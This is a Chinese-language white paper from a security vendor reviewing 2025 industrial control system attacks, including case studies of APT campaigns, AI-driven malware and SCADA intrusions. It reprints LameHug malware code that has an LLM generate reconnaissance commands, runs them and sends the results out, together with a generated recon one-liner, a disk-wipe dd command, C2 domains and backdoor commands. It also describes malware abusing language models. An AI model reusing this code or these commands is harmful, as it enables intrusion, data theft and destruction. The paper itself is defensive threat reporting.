> **来源:[研报客](https://pc.yanbaoke.cn)** # Industrial Control # System Threats - 2025 # 工业控制系统安全威胁白皮书2025 # 工业控制系统安全威胁白皮书 # Industrial Control System Threats - 2025 浙江国利网安科技有限公司 2025年12月 # 目录 前言 一、概述 二、2025典型工控安全事件回顾 3 1、美国NSA长期渗透并攻击中国科学院国家授时中心 3 2、人工智能驱动的信息窃取程序LameHug攻击乌克兰组织. 6 3、ESET发现首个人工智能驱动的勒索软件 PromptLock……8 4、黑客入侵挪威大坝并将大坝阀门完全打开 9 5、伊朗攻击以色列城市监控系统为导弹打击提供支持 11 6、Lab-Dookhtegan 黑客组织攻击伊朗卫星网络导致伊朗船只失联…12 7、IDS组织攻击乌克兰电力SCADA 14 8、Sticky Werewolf 黑客组织攻击俄罗斯的科研和生产企业…… 16 9、蔓灵花APT组织借克什米尔冲突对巴基斯坦电信系统发起攻击..17 10、阿联酋关键基础设施遭受多语言恶意软件攻击 19 三、2025工业控制系统的安全漏洞分布 22 1、工业控制系统重点漏洞 22 2、工业控制系统漏洞统计分析 25 (1)漏洞的类型和数量 26 (2) 漏洞的厂商分布 ..... 27 (3) 漏洞的危害统计 ..... 28 (4)漏洞的产品分布 30 四、2025极星工控安全实验室研究 31 1、工业软件通用组件发现系列高危漏洞 31 2、工业控制系统“最强”隔离措施网闸发现系列高危漏洞……33 3、AI&渗透测试,自动渗透机器人前瞻性技术研究 36 五、国利网安1321多域立体工控安全智能解决方案 37 六、2025年工业控制系统安全相关政策法规 39 1、《中华人民共和国网络安全法》(2025修正版) 39 2、《网络关键设备安全技术要求 可编程逻辑控制器(PLC)》....40 3、《国家网络安全事件报告管理办法》 40 4、《工业领域数据安全风险评估规范》 40 5、《2025年工业和信息化标准工作要点》 41 6、《网络安全技术 信息安全管理体系 要求》 41 # 前言 2025年国际地缘政治冲突此起彼伏,在俄乌冲突、伊以冲突以及印巴冲突中,双方在物理空间激烈对抗的同时,日益重视对工业控制系统网络空间领域的攻击。针对工业控制系统的网络攻击不仅导致了关键信息基础设施的损毁,而且正成为支持物理空间军事行动的重要手段。通过对工业控制系统网络空间的入侵,攻击者可以实时掌握物理空间的打击效果,利用这些反馈来辅助调整物理空间的打击策略,实现更好的打击效果。 随着以大语言模型为代表的人工智能技术的突破和普及,人工智能正以前所未有的速度深刻影响着各行各业。在工业控制系统网络安全领域,人工智能正逐步从攻击者的辅助工具演变为支持全流程自动化攻击的关键手段。一些恶意软件通过内置的大语言模型基于特定的目标快速生成高度定制化的攻击代码,这类攻击带来的挑战尤为严峻:由于攻击代码是在获取目标信息后动态生成,而非预先嵌入恶意软件中,传统依赖特征码匹配的防御机制难以提前识别和阻断,从而显著降低了现有防护体系的有效性。 面对日益严峻的网络安全环境,需要政府、企业和行业组织共同构建全方位的防御体系。2025年10月28日,十四届全国人大常委会第十八次会议表决通过关于修改网络安全法的决定,正是应对当前的网络环境从法律层面做出的重要调整。企业应密切关注工业控制系统相关的标准和政策,结合企业的系统环境制定具有针对性的安全防护策略。 当前工业控制系统面临的攻击环境日益复杂,在人工智能的加持下,攻击者构建攻击工具的时间大大缩短,新型攻击思路的验证效率显著提高,进一步加剧了安全威胁。迫切需要企业重视安全防御体系建设,降低企业面临的安全风险。 # 一、概述 随着人工智能技术的日益成熟与广泛应用,2025年工业控制系统安全面临着新的挑战,传统的勒索软件、供应链攻击和网络钓鱼等攻击方式,在人工智能技术的支持下,展现出更高的自动化水平和攻击效率,持续威胁工业控制系统安全。另一方面,国际地缘政治冲突此起彼伏,俄乌冲突、印巴冲突以及伊以冲突等更是将工业控制系统作为重点攻击对象。这背后的原因在于工业控制系统已经被广泛应用到关键基础设施的核心控制层,其安全性直接影响着国民经济、公共安全和社会稳定。因此,在针对工业控制系统安全的防御上,引入新的防御理念并建立健全政策法规是保障工业控制系统安全的重要基石。总结2025年工业控制系统的安全趋势,不难发现以下特点。 (1)攻击者不仅追求对关键基础设施的实际毁伤,也越来越重视攻击所引发的舆论影响。针对一些大型的国际公开赛事的攻击,或者散布一些针对关键基础设施的攻击谣言。在攻击成功的情况下,攻击方会刻意放大事件引发公众恐慌,以加剧社会心理冲击;即便攻击并未发生,仅通过制造和传播谣言,也能在冲突的关键时期扰乱舆论、动摇公众信心,进而诱发社会动荡。 (2)生成式AI在攻防两端扮演了关键角色。在攻击侧,攻击者正利用生成式AI快速编写针对特定工控协议(如Modbus,S7comm)的恶意代码,甚至生成高度逼真的钓鱼邮件以突破OT人员的防线,极大提高了攻击的效率。在防御侧,基于AI的异常检测将成为标配,它能学习工厂正常的流量基线,一旦出现细微的异常操作指令,AI能比人类更快地发出预警并阻断。 (3)2025年的攻击事件更具物理破坏性。攻击者试图夺取HMI(人机界面)的控制权,通过修改界面参数、关闭安全联锁系统或利用过热导致设备物理损坏等方式对控制系统进行破坏。 (4)地缘政治驱动的APT攻击常态化。能源、水利、交通等关键信息基础设施已成为现代混合战争的首选目标。国家级APT组织更频繁地潜伏在关键工控网络中。他们使用“寄生攻击”技术,利用系统自带的合法工具进行破坏,极难被发现。2025年,针对电网调度、天然气管道和港口物流系统的预置性攻击探 测显著增加,其目的可能不是立即破坏,而是建立长期的战略威慑能力。 (5)工业控制系统安全漏洞依然是企业面临的一个巨大安全隐患。从2025年的工控安全事件和漏洞统计中不难发现,系统漏洞为攻击者提供了高效的入侵途径。工业控制系统的漏洞普遍存在更新补丁不及时的情况,攻击者一旦掌握了系统漏洞的利用方式,会给工业企业带来严重威胁。 # 二、2025典型工控安全事件回顾 2025年工业控制系统面临的攻击依然源源不断,这些攻击活动涉及到能源、炼化、电力、水务、交通等行业的基础设施。相比于2024年,2025年的攻击事件呈现出了一些新的特征。首先,攻击者不仅关注攻击事件对企业造成的实质影响,同时也注重攻击事件所带来的舆论影响。在巴基斯坦声称针对印度的电网攻击中,尽管遭到印度的否认,但舆论影响巨大。其次,针对工业控制系统的攻击越来越多地服务于国家和地区间的地缘冲突,扩大了冲突双方的对抗空间,进一步凸显了工业控制系统安全的重要性。最后,随着人工智能的进一步发展和成熟,其在工业控制系统攻击中的应用也愈发广泛,它提高了攻击的效率,同时给防御带来了新的挑战。 这些攻击事件给相关的工业企业带来了巨大的安全威胁。本文选取了2025年具有代表性的工业控制系统安全事件,这些事件集中反映了当前主要的攻击趋势。通过对攻击过程及其影响的简要分析,旨在提升工业企业对工业控制系统安全风险的认知,推动其加强防护体系建设,切实应对日益复杂的网络威胁环境。 # 1、美国NSA长期渗透并攻击中国科学院国家授时中心 2025年10月,中国国家安全机关披露并确认了一起针对国家关键信息基础设施——中国科学院国家授时中心(以下简称“授时中心”)的重大网络间谍活动。经国家互联网应急中心(CNCERT)深度溯源分析,确认该攻击行动由美国国家安全局(NSA)策划并实施。此次攻击活动呈现出长期性、隐蔽性及高度针对性的特征。攻击者利用“三角测量”行动窃取移动终端凭证作为突破口,进而渗透内部计算机网络,部署多达42款定制化网络攻击武器,构建起多层加密的隐蔽通信隧道,意图对高精度地基授时导航系统等国家级战略科技设施进行渗透与破坏。 <table><tr><td>序号</td><td>时间</td><td>事件</td></tr><tr><td>1</td><td>2023/08/03 03:44:54</td><td>远程登录</td></tr><tr><td>2</td><td>2023/08/03 04:00:23</td><td>远程登录</td></tr><tr><td>3</td><td>2023/08/03 04:06:32</td><td>网攻武器回连</td></tr><tr><td>4</td><td>2023/08/03 04:07:04</td><td>远程登录</td></tr><tr><td>5</td><td>2023/08/03 04:19:12</td><td>网攻武器心跳回连</td></tr><tr><td>6</td><td>2023/08/03 04:26:46</td><td>远程登录</td></tr><tr><td>7</td><td>2023/08/03 04:31:41</td><td>远程退出</td></tr><tr><td>8</td><td>2023/08/03 04:58:35</td><td>网攻武器心跳回连</td></tr><tr><td>9</td><td>2023/08/03 05:19:33</td><td>网攻武器心跳回连</td></tr><tr><td>10</td><td>2023/08/03 05:35:44</td><td>网攻武器心跳回连</td></tr><tr><td>11</td><td>2023/08/03 05:45:14</td><td>网攻武器心跳回连</td></tr><tr><td>12</td><td>2023/08/03 05:58:22</td><td>网攻武器心跳回连</td></tr><tr><td>13</td><td>2023/08/03 06:04:55</td><td>网攻武器回连并清除退出</td></tr></table> 图12023年8月3日攻击过程 攻击活动的时间跨度长达两年以上,可划分为四个核心阶段: 初始突破与凭证窃取(2022.03-2023.04):攻击者首先利用某国外品牌手机的短信服务漏洞,对授时中心10余名关键岗位人员实施秘密监控,非法窃取通讯录、短信及位置信息。随后,通过内网管理员手机中的登录凭证,成功获取办公计算机的远程控制权限。 据点建立与环境探测(2023.04-2023.08):在获取初步权限后,攻击者利用匿名通信网络(Tor等)作为掩护,在非工作时间(凌晨)多次远程登录受控终端。以此为跳板,对授时中心的内部网络拓扑、业务系统架构进行深度刺探,为后续大规模渗透做准备。 武器植入与持久化(2023.08-2024.03):攻击者开始在网管计算机上部署名为“Back_eleven”的早期版本隧道工具。为规避检测,攻击者采取了极为谨慎的“即用即清”策略,每次操作结束后均清除内存驻留痕迹,并在运行前强制关闭目标主机的杀毒软件。 全面渗透与横向移动(2024.03-2024.06):随着攻击深入,NSA针对授时中心的特定网络环境,定制开发并投送了包括“eHome_0cx”(前哨控守)、“Back_eleven”(隧道搭建)及“New_Dsz_Implant”(数据窃取)在内的新型武器组件。攻击者构建了四层嵌套加密隧道,并以此为跳板成功横向移动至上网 认证服务器及防火墙等核心网络设备,实施了大规模数据窃取。 图2网络武器加密模式 技术取证显示,本次攻击使用了高度模块化的先进网络攻击武器库,主要技术特征如下: 高度同源性:核心数据窃取工具“New-Dsz-Implant”在代码结构、功能模块命名及实现逻辑上,与NSA此前被曝光的“DanderSpritz”(怒火喷射)武器平台存在高度同源性,但在反取证与免杀能力上进行了显著升级。 隐蔽控守技术:“eHome_Ocx”模块通过DLL劫持技术寄生于系统正常服务(如资源管理器),并在运行时抹除PE头信息以对抗内存取证。其通信采用RSA公钥加密与TLS协议结合的方式,确保指令交互的机密性。 多层嵌套加密隧道:为突破流量审计,攻击者设计了复杂的通信链路。通过“New-Dsz-Implant”与“Back_Eleven”的配合,建立了“TLS外层 $+$ RSA/AES内层 $+$ 本地回环”的四层嵌套加密模式,极大增加了流量解密与还原的难度。 图3 嵌套加密模式 本次事件再次证实,国家级APT组织在针对关键基础设施的攻击中,正从单一的技术渗透向“移动端突破+内网持久化+供应链利用”的复合战术演进。NSA展现了在零日漏洞利用、免杀技术储备及加密通信协议设计上的世界领先水准,但也暴露出其武器库在被频繁曝光后技术迭代的路径依赖特征。鉴于授时中心在国家金融、能源、通信及国防领域的基石作用,此次防御与溯源成果对于保障中国国家时频体系安全具有战略意义。 # 2、人工智能驱动的信息窃取程序LameHug攻击乌克兰组织 2025年7月,乌克兰计算机应急响应小组披露了LameHug的出现,这是首个公开报道的由人工智能驱动的信息窃取程序。该信息窃取程序被认为由APT28组织开发。 LameHug 通过集成大型语言模型(LLM)进行动态命令生成,代表了恶意软件开发领域的一次范式转变。该恶意软件使用 Python 编写,并利用 Hugging Face API 与阿里云的 Qwen 2.5-Coder-32B-Instruct 模型进行交互,该模型是一个专门用于代码生成和编程相关任务的开源 LLM。这种架构选择使恶意软件能够实时将自然语言描述转换为可执行的 Windows 命令,从而从根本上改变了传统的恶意软件执行模式。 人工智能集成通过复杂的基于提示的系统运行,LameHug 向 LLM 发送提示,并接收针对特定侦察和数据窃取目标动态生成的命令序列。 ```python def LLM_QUERY_EX(): prompt = { 'messages': [ 'role': 'Windows systems administrator', 'content': 'Make a list of commands to create folder C:\Programdata\info and to gather computer information, hardware information, process and services information, networks information, AD domain information, to execute in one line and add each result to text file c:\Programdata\info\info.txt. 'Return only commands, without markdown'], ] 'temperature': 0.1, 'top_p': 0.1, 'model': 'Owen/Owen2.5-Coder-32B-Instruct'] llm_query = query_text_prompt) theproc = subprocess.run(llm_query, shell = True, stdout = subprocess.Pipe, stderr = subprocess.STDOUT) prompt = { 'messages': [ 'role': 'Windows systems administrator', 'content': 'Make a list of commands to copy recursively different office and pdf/text documents in user Documents,Downloads and Desktop folders to a folder c:\Programdata\info\to execute in one line. Return only command, without markdown.' ], 'temperature': 0.1, 'top_p': 0.1, 'model': 'Owen/Owen2.5-Coder-32B-Instruct'] llm_query = query_text_prompt) theproc = subprocess.run(llm_query, shell = True, stdout = subprocess.Pipe, stderr = subprocess.STDOUT) ssh_send('c:\Programdata\info') return 0 ``` 图4LameHug硬编码的LLM提示 该恶意软件可以生成复杂的多个命令序列,包括通过systeminfo收集系统信息、通过wmic查询进行硬件枚举、通过ipconfig分析网络配置以及使用whoami命令评估用户权限。这种方法消除了对硬编码命令序列的需求,使每个感染实例的执行方式都独一无二。以下是基于LameHug硬编码提示的LLM生成命令示例。 ```batch cmd.exe /c "mkdir %PROGRAMDATA%\info && systeminfo >> %PROGRAMDATA%\info\info.txt && wmic computersystem get name,manufacturer,model >> %PROGRAMDATA%\info\info.txt && wmic cpu get name, speed >> %PROGRAMDATA%\info\info.txt && wmic memorychip get capacity, speed >> %PROGRAMDATA%\info\info.txt && wmic diskdrive get model, size >> %PROGRAMDATA%\info\info.txt && wmic nic get name, macaddress, ipaddress >> %PROGRAMDATA%\info\info.txt && tasklist >> %PROGRAMDATA%\info\info.txt && net start >> %PROGRAMDATA%\info\info.txt && ipconfig /all >> %PROGRAMDATA%\info\info.txt && whoami /user >> %PROGRAMDATA%\info\info.txt && whoami/groups >> %PROGRAMDATA%\info\info.txt && net config workstation >> %PROGRAMDATA%\info\info.txt && dsquery user -samid username>> %PROGRAMDATA%\info\info.txt && dsquery computer -name %COMPUTERNAME>> %PROGRAMDATA%\info\info.txt && dsquery group >> %PROGRAMDATA%\info\info.txt && dsquery ou >> %PROGRAMDATA%\info\info.txt && dsquery site >> %PROGRAMDATA%\info\info.txt && dsquery subnet >> %PROGRAMDATA%\info\info.txt && dsquery server >> %PROGRAMDATA%\info\info.txt && dsquery domain >> %PROGRAMDATA%\info\info.txt" ``` 图5大模型生成的命令序列 LameHug 的操作复杂性不仅限于简单的命令生成,还包括利用人工智能驱动的适应性来实现高级规避技术。该信息窃取程序使用 Hugging Face 基础设施,提供了固有的隐蔽性优势,因为与 LLM API 的通信看起来像是对基于云的人工智能服务的合法流量。这种混淆技术使得基于网络的检测变得更加困难,因为安全解决方案必须区分合法的人工智能服务使用和恶意命令生成活动。 人工智能生成命令的动态特性为恶意软件行为模式带来了前所未有的可变性。传统的基于签名的检测系统依赖于识别特定的命令序列或行为模式。然而,LameHug 能够为每次部署生成上下文相关但又独特的命令组合,使得这些检测方法在很大程度上失效。 LameHug 的出现标志着网络威胁格局正在发生根本性转变,朝着更加自主、更具适应性的恶意软件家族发展。这一进展标志着一个新时代的到来,人工智能技术被直接集成到恶意代码执行中,而不仅仅是用于辅助开发或分析阶段。 该恶意软件成功地对乌克兰组织进行了实际攻击,表明人工智能驱动的攻击工具已经从理论概念转变为国家支持的武器库中的实用武器。这一趋势表明,其他威胁行为者也可能会投资开发类似的能力,从而可能加速人工智能增强型恶意软件家族在网络威胁领域的传播。 # 3、ESET发现首个人工智能驱动的勒索软件PromptLock 2025年8月27日,ESET研究实验室正式披露了一种名为PromptLock的新型勒索软件。与传统依赖硬编码指令的恶意软件不同,PromptLock是首个被证实深度利用生成式人工智能技术来执行核心攻击链的勒索软件样本。该恶意软件通过集成或调用本地大语言模型(LLM),能够实时生成适配多种操作系统的恶意脚本,并自主决策数据的加密与窃取策略。PromptLock的出现标志着勒索软件从“自动化”向“智能化”演进的关键转折点,预示着网络攻击门槛的大幅降低与防御难度的指数级上升。随后,纽约大学(NYU)Tandon工程学院的研究团队证实,该恶意软件实际是被命名为“Ransomware3.0”的学术研究项目的概念验证代码。 图6勒索软件对比(左侧为1.0和2.0,右侧为3.0) PromptLock 不再携带静态的恶意载荷,而是利用本地可访问的 AI 语言模型 API,根据预设的自然语言提示实时生成恶意代码。取证分析显示,其主要生 成的是 Lua 脚本。这种动态生成的特性赋予了恶意软件极强的跨平台兼容性,能够无缝攻击 Windows、Linux 和 macOS 环境,且每次生成的代码特征可能存在微小差异,从而有效规避基于特征码的传统反病毒检测。NYU 团队在最终测试阶段将其上传至 VirusTotal,因其独特的多态性特征避开了所有主流防病毒引擎的检测。 传统勒索软件通常对所有文件进行无差别加密。而 PromptLock 具备初步的“认知”能力。它会对受害主机的本地文件进行扫描和内容分析,依据 AI 模型的判断逻辑,自主决定哪些文件具有高价值需要被窃取,哪些文件应当被就地加密。这种智能化的筛选机制极大地提高了攻击的针对性和勒索效率。 PromptLock 的出现表明,攻击者不再需要具备高深的逆向工程或漏洞利用开发能力。只需构建精心设计的提示词并配置好 AI 模型,即可生成复杂的、具有自适应能力的恶意软件。这将导致脚本小子也能发动专业级的网络攻击。由于核心恶意逻辑是在受害者本地“即时生成”的,且代码形态多变,传统的静态沙箱和基于签名的检测引擎可能面临严重失效风险。 # 4、黑客入侵挪威大坝并将大坝阀门完全打开 2025年4月,黑客成功控制了挪威布雷芒格Risevatnet附近一座大坝设施的关键运营系统。4月7日,大坝业主Breivika Eiendom发现了这起事故,事故持续了近四个小时。4月10日,挪威水资源与能源管理局(NSM)和挪威水资源与能源局(NVE)接到报警,目前该案件正在挪威警察局下属特别机构Kripos的调查中。黑客在攻击中能够调整最小流量阀,将其完全打开至 $100\%$ 容量,这导致每秒的流量比规定的最低流量多出497升,由于大坝的泄洪能力约为每秒20,000升,因此并未被视为紧急状态。 图7大坝地图 调查显示,攻击者可能为亲俄组织Z-Alliance,该组织在2024年9月的自我介绍中声称对美国一家水处理厂遭到黑客攻击负责。此外,该组织还定期报告针对工业控制系统(SCADA)的攻击,并分享HMI界面的截图和视频作为证据。他们声称的许多入侵行为仍未经证实,但其中一些已引起媒体关注,例如去年秋天韩国智能农场遭到的入侵。其攻击方式主要利用了SCADA系统中存在的弱口令。Z-Alliance还介绍了一位官方发言人Yulia,并公布了其Twitter账号,她似乎就是现已不复存在的人民网络军(使用别名RCAT)的Julia。 图8 黑客发布的声明 针对此次攻击事件,Z-Alliance在其Telegram频道上大肆宣扬,并公布了攻击中的相关视频和截图作为证据。从其视频的细节中可以发现,视频中的地点为Vannstand Risevatnet,与遭到攻击的大坝地点一致,同时攻击的时间也与公开报道的大坝遭到攻击的时间一致。 图9 黑客公布的截图 HopberniaFlorØ, Vestland county, Norway.6OpuyoBaHne KOMpaHn Fokus Electro AS daet cepbe3hbl c60eCn BMeuBAOTc npopoccnckne xaKepebl Norway FlorØ, Vestland county, Norway. Fokus Electro AS equipment malfunctions seriously if pro- Russian hackers interfere # 5、伊朗攻击以色列城市监控系统为导弹打击提供支持 伊朗MuddyWater(浑水)组织被美国政府确认属于拉纳情报计算机公司(Rana Intelligence Computer Company),该公司受伊朗情报与安全部指使。该组织在伊以冲突期间利用以色列私人监控摄像头收集实时情报,用于为物理打击提供支持。 2025年5月13日:MuddyWater专门为网络行动提供服务器,建立其行动所需的基础设施数。 2025年6月17日:攻击者利用其服务器基础设施访问了另一台已被入侵的 服务器,该服务器包含来自耶路撒冷的实时监控视频流。这使得攻击者能够实时掌握耶路撒冷市内潜在目标的影像信息。 2025年6月23日:伊朗对耶路撒冷发动大规模导弹袭击。同日,以色列当局报告称,伊朗军队利用被入侵的监控摄像头收集实时情报并调整导弹目标。 图10 彭博社报道的以色列遭袭的监控画面 据彭博社报道,以色列官员敦促民众断开联网监控摄像头,并警告称伊朗正在利用这些摄像头“收集实时情报并调整导弹目标”。 这表明网络战与传统军事行动之间的界限正迅速模糊。亚马逊威胁情报团队将这种行为称为“网络赋能的军事打击”,即国家级威胁行为体系统性地利用网络行动来支持和增强其物理行动。传统的网络安全框架通常将数字威胁和物理威胁视为两个独立的领域。然而,亚马逊的研究表明,这种划分越来越不切实际。多个国家级威胁组织正在开创一种新的作战模式,在这种模式下,网络侦察直接赋能于军事打击。国家行为体在战争方式上正在发生根本性的转变。这些不再仅仅是造成物理损害的网络攻击;而是精心策划的协同作战行动,其中数字行动旨在支持实际的军事目标。 # 6、Lab-Dookhtegan 黑客组织攻击伊朗卫星网络导致伊朗船只失联 2025年8月,针对伊朗关键海事基础设施发生了一起具有高度破坏性的网络攻击事件。该攻击由被称为“Lab-Dookhtegan”的威胁组织发起,导致伊朗国家油轮公司(NITC)和伊朗伊斯兰共和国航运公司(IRISL)旗下的64艘商船(包 括39艘油轮和25艘货轮)通信完全中断。与常规的服务拒绝攻击不同,此次行动表现出显著的物理破坏意图,导致受影响船舶的卫星通信终端遭受不可逆的逻辑损坏,严重瘫痪了其远洋航行与调度能力。 图11 被袭击时船只的位置 本次攻击并未直接针对分散的船舶终端,而是采用典型的供应链打击手法。攻击者成功渗透了为伊朗船队提供卫星通信服务的上游IT供应商——Fanava集团。技术取证显示,攻击者利用了供应商基础设施中运行的极度过时的iDirect卫星通信软件(版本2.6.35)作为突破口。通过获取Linux终端的Root权限,攻击者得以访问并控制整个船队的通信中枢。数据库日志表明,攻击者利用MySQL查询指令,精确映射了目标船队的网络拓扑,获取了包括调制解调器序列号、网络ID在内的完整资产清单,实现了对特定高价值目标的精准定位。 电子邮件日志与系统警报分析揭示,这是一场精心策划的长期行动。攻击者早在2025年5月至6月期间便已潜伏在Fanava的网络内部,维持了长达五个月的持续访问权限。在此期间,攻击者不仅监控了过往通信,还针对名为“Falcon”的核心通信链路维持软件进行了多次隐蔽的控制测试(如触发“节点下线”警报),旨在验证其切断船舶与岸基指挥中心联系的能力。 图12 邮件记录 2025年8月的攻击行动由单纯的潜伏监控转变为实施“焦土政策”的破坏性打击。攻击者在受控终端上执行了系统级的擦除指令(如dd if=/dev/zeroof=/dev/mmcblk0p1),向存储分区写入零数据。该操作覆盖了包括导航日志、系统配置及恢复分区在内的六个关键存储区域。这种“逻辑致砖”手段导致设备无法通过远程补丁修复,必须由技术人员在港口登船进行物理更换或底层重装。此外,攻击者还窃取了包含明文密码的IP电话配置数据,使得语音通信系统同样面临被监听或阻断的风险。 此次攻击发生在美国财政部扩大对伊朗石油贸易制裁的敏感时间窗口,精准打击了高度依赖隐蔽航行以规避制裁的NITC与IRISL船队。通信与导航系统的瘫痪不仅迫使船舶无法接收气象与港口指令,更使其失去了在紧急情况下的求救能力,对伊朗的海上物流生命线构成了灾难性的战术阻断,预计恢复周期将长达数周至数月。 # 7、IDS组织攻击乌克兰电力SCADA 2025年8月22日,俄罗斯黑客组织“基础设施破坏小队”(Infrastructure Destruction Squad)声称成功入侵乌克兰索菲夫斯卡·博尔沙希夫卡的一处电力SCADA系统,并修改了系统的参数,导致一台主要备用发电机停止运行。 图13遭到攻击的电力SCADA 来自Cyble的最新数据显示,黑客行动主义者正在升级针对关键基础设施的攻击,不再局限于基本的DDoS攻击和网页篡改,而是转向更高级的入侵和数据泄露手段。今年第二季度,针对工业控制系统的攻击、数据泄露和基于访问权限的入侵占黑客行动主义活动的 $31\%$ ,较第一季度增长了 $29\%$ 。值得注意的是,与俄罗斯有关联的黑客组织主导了针对ICS的攻击。 Cyble在其博客文章中指出:“自去年与俄罗斯有关联的Z-Pentest组织出现以来,针对工业控制系统的攻击已成为黑客行动主义者日益常用的手段。这种从表面破坏到基础设施层面干扰的转变,表明黑客行动主义生态系统内部的战略意图和技术能力正在不断增强。”文章还指出:“新成立的组织‘基础设施破坏小队’在第二季度发动了26起针对ICS的攻击事件,并在6月份出现了显著的行动高峰。” 图14攻击者修改系统参数 # 8、Sticky Werewolf 黑客组织攻击俄罗斯的科研和生产企业 2025年1月,F6的研究人员报告了“粘性狼人”(Sticky Werewolf)组织的活动,该组织攻击了俄罗斯的科研和生产企业。攻击者发送恶意电子邮件,其中包含向与监狱机构有合作关系的国防工业企业下单的指令。邮件包含两个附件:一个伪装成工业和贸易部官方文件的诱饵文件,以及一个受密码保护的恶意RAR压缩包(“填写表单.rar”)。该压缩包包含一个名为“邮件列表.docx”的文档和一个名为“表单填写.pdf.exe”的恶意可执行文件,该文件一旦运行,最终会植入Ozone远程访问木马。进一步调查发现,攻击者还发送了一封主题类似的钓鱼邮件,日期为2024年12月23日,邮件中包含两个伪造文档。攻击者的目标是一家科研和生产机构;然而,该邮件中并没有包含有效载荷的压缩包。 图15 钓鱼邮件 今年3月,F6的研究人员也报告了Sticky Werewolf组织发起的新攻击。该组织的目标是一家石油和天然气设备制造商。检测到的邮件中包含一个受密码保护的7z压缩包。Sticky Werewolf使用了来自工业和贸易部的诱饵文件。该组织执行了其经典的攻击链,其中包括NSIS投放器安装程序、BAT文件和AutoIt脚本,最终创建了RegAsm.exe进程,并将QuasarRAT注入其中。该组织自2024年10月起一直在使用其中一个C2域名(crostech[.]ru)。第二个域名(thelightpower[.]info)于同年12月注册,最早使用该域名发起的攻击可以追溯到今年3月。 图167z压缩文件内容 # 9、蔓灵花APT组织借克什米尔冲突对巴基斯坦电信系统发起攻击 2025年5月7日,在巴基斯坦和印度之间军事冲突升级期间,尤其是在印度发起的“辛杜尔行动”(Operation Sindoor)的背景下,Bitter APT(又名蔓 灵花)很可能针对巴基斯坦电信有限公司(PTCL)的员工发起了一场鱼叉式网络钓鱼攻击,以此传播恶意软件。分析师评估认为,Bitter APT很可能是一个南亚国家支持的黑客组织,通过窃取国家和商业机密进行网络间谍活动。 CTD HQ <ctd@islamabadpolice.gov.pk> Security Brief Report Afzaal Akmal/IP Network DevOps/Technology/Islamabad; +43 图17 攻击者发送的钓鱼邮件 Security Brief Report, iqy 0 bytes Dear Team Kindly find attachment for security brief. For your information and necessary action, please: Regards 研究人员评估认为,Bitter APT极有可能使用了从巴基斯坦反恐部门(CTD)窃取的电子邮件凭证来实施此次攻击。此次鱼叉式网络钓鱼活动的目标是巴基斯坦电信公司(PTCL)的关键岗位人员,包括5G基础设施工程师、DevOps专家、项目经理和卫星通信专家。 2025年5月7日星期三下午12:09收到的恶意电子邮件包含一个带有恶意Excel宏的InternetQuery(IQY)附件。该宏使用Windows命令行(CMD)下载并执行WmRAT变种。文件执行后,攻击者与一个命令与控制域建立了连接,该域之前与BitterAPT组织有关联,并解析到一个已知的关联IP地址。 对巴基斯坦首都伊斯兰堡警察总部反恐部门(CTD)电子邮件账户(ctd@islamabadpolice.gov.pk)的首次访问权限很可能是使用被盗用的凭证获得的。这些凭证源自一台感染了StealC信息窃取程序的巴基斯坦计算机,该窃取程序于2024年8月13日首次被发现。 图18首次窃取CTD邮件凭据日志 巴基斯坦反恐部门(CTD)的电子邮件账户被攻破,使攻击者得以长期、特权地访问巴基斯坦的关键执法系统。这一持续的立足点使攻击者能够监控通信,并在印巴冲突期间利用被攻破的账户精心制作极具迷惑性的鱼叉式网络钓鱼邮件。攻击者的目的很可能是企图在地区局势紧张时期攻击巴基斯坦的电信行业。这一时间点也符合Bitter APT组织一贯通过网络间谍活动进行战略情报搜集的模式。 # 10、阿联酋关键基础设施遭受多语言恶意软件攻击 2025年3月4日,据proofpoint的研究人员警告称,伊朗黑客组织UNK_CraftyCamel使用polyglot文件隐藏新型后门程序,发起了针对阿联酋航空、卫星通信和交通行业的鱼叉式钓鱼攻击。 # (1) 攻击活动详情 2024年10月下旬,UNK_CraftyCamel攻击者利用印度电子公司(INDIC Electronics)泄露的电子邮件账户发送了恶意电子邮件。这些电子邮件包含指向攻击者控制的域indicelectronics.net的URL,该域模仿了正常的INDIC electronics域。 攻击者“利用了被入侵的发件人与目标之间的信任关系,通过伪装成B2B销 售产品的方式,诱导目标点击邮件中的恶意链接”,邮件内容包括了订单表格和公司背景介绍。邮件中包含的以.com结尾的URL看似指向合法的INDIC Electronics主页,但实际上指向一个名为“indicelectronics.net”的虚假域名。该恶意链接为一个ZIP压缩包的下载链接,ZIP文件内有一个XLS文件(Excel电子表格)和两个PDF文件。 经过进一步调查,Proofpoint 确定 XLS 文件实际上是一个使用双扩展名的 LNK 文件,而 PDF 文件都是多语言文件;第一个是附加了 HTA 的 PDF 文件,而第二个 PDF 文件附加了一个 ZIP 文档。 攻击者通过LNK文件启动cmd.exe,然后使用mshta.exe执行隐藏在第一个PDF文件中的HTA脚本,该脚本会加载第二个PDF文件。隐藏在第二个PDF中的恶意代码会向Windows注册表写入一个URL文件以便实现持久化驻留,然后执行一个经过XOR加密过的JPEG文件,该文件会解密一个DLL载荷,文件名为yourdllfinal.dll,该文件即为Sosano后门程序。 图19安装后门程序的攻击链 # (2) Sosano 后门程序 Sosano 是一个基于 Go 语言编写的功能相对简单的后门程序,但是该后门的作者通过包含一些在后门程序不会使用的库文件故意增加了文件的大小,以此来混淆恶意代码并增加对该后门程序的分析难度。该后门文件有 12M 左右,一旦运行,它首先会选择一个随机时长进行睡眠,这样可以躲避在沙箱中进行的自动检测。睡眠结束后才会去连接 C2 服务器。该后门程序支持的命令如下。 表 1 Sosano 后门支持的命令 <table><tr><td>命令</td><td>描述</td></tr><tr><td>sosano</td><td>获取当前目录、更改工作目录</td></tr><tr><td>yangom</td><td>列出当前目录下的内容</td></tr><tr><td>monday</td><td>下载并加载其他载荷</td></tr><tr><td>raian</td><td>删除一个目录</td></tr><tr><td>lunna</td><td>执行一个 shell 命令</td></tr></table> # (3)攻击者UNK_CraftyCamel 目前,这个被指定为UNK_CraftyCamel的组织与Proofpoint跟踪的任何其他已识别的APT组织均不重叠。该组织的邮件收件人数量少、诱饵的高度针对性以及多次试图混淆恶意软件表明其有明确的授权,通过分析表明该组织可能与伊朗有联系。Proofpoint已确定APT33和APT35中的多个战术、技术和程序(TTP)与疑似伊斯兰革命卫队(IRGC)联盟的活动相似。这两个团体历来都专注于针对航空航天联盟组织。此外,APT33和UNK_CraftyCamel都在阿联酋的高度针对性活动中使用了HTA文件;APT35和UNK_CraftyCamel都倾向于通过B2B优惠来接近目标,其次都是针对同一家公司的工程师。尽管存在这些相似之处,但Proofpoint仍评估UNK_CraftyCamel是一个不属于APT33和APT35的单独威胁组织。 